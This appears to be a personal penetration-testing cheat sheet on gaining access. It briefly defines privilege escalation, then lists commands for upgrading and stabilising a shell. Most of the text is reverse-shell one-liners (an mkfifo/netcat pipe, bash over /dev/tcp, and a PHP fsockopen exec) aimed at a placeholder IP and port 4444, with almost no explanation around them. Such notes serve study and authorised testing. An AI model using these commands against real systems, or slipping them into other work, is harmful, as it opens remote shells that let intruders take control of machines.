Exploit (Gaining Access)

Definitions

horizontal elevation = get the privileges of a user in the same circle of use

vertical elevation = get the most advanced privileges (root/administrator)

Reverse Shell

Shell upgrading

/usr/bin/script -qc /bin/bash /dev/null # works almost all the time

python3 -c 'import pty;pty.spawn("/bin/bash")' # only if python is installed

Shell Stabilization

export TERM=xterm # this will give us access to term commands such as clear
Ctrl + Z # background the shell
stty raw -echo; fg # This does two things: 1. it turns off our own terminal echo (which gives us access to tab autocompletion, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.

Write multiple lines in a file with echo

echo "line 1
line 2" >> file.txt

BASH reverse shell one line

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc [ip] 4444 >/tmp/f

bash -c "bash -i >& /dev/tcp/[ip]/4444 0>&1" # possibility not to use 'bash -c' at the beginning

nc [IP] [PORT]

php -r '$sock=fsockopen("[IP]",[port]);exec("/bin/sh -i <&3 >&3 2>&3");'